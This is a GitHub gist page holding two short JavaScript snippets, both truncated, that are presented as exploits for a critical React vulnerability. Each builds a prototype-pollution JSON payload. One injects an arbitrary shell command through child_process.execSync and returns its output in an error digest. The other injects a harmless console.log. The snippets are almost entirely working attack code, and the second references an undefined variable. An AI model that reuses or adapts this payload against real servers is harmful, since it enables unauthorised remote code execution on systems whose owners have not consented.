Akshay Saini akshaymarch7

akshaymarch7 / exploit1.js
Created December 16, 2025 05:01
React Critical Vulnerability (CVSS 10.0) - exploit1 code
(async () => {
// === CONFIGURATION ===
const cmd = "touch iWasHere"; // The command you want to run
const targetUrl = "/namaste"; // The endpoint to hit (relative to current domain)
console.log(`[*] Attempting to run command: ${cmd}`);
// 1. Construct the malicious payload
// This injects the command into a child_process.execSync call and throws the result in an error digest
const payloadJson = `{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\\"then\\":\\"$B1337\\"}","_response":{"_prefix":"var res=process.mainModule.require('child_process').execSync('${cmd}').toString('base64');throw Object.assign(new Error('x'),{digest: res});","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}`;
akshaymarch7 / exploit0.js
Created December 16, 2025 04:59
React Critical Vulnerability (CVSS 10.0) - exploit0 code
(async () => {
// === CONFIGURATION ===
const targetUrl = "/namaste"; // The endpoint to hit (relative to current domain)
console.log(`[*] Attempting to run command: ${cmd}`);
// 1. Construct the malicious payload
// This injects the command into a child_process.execSync call and throws the result in an error digest
const payloadJson = `{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\\"then\\":\\"$B1337\\"}","_response":{"_prefix":"console.log('meowmeow')//","_formData":{"get":"$1:constructor:constructor"}}}`;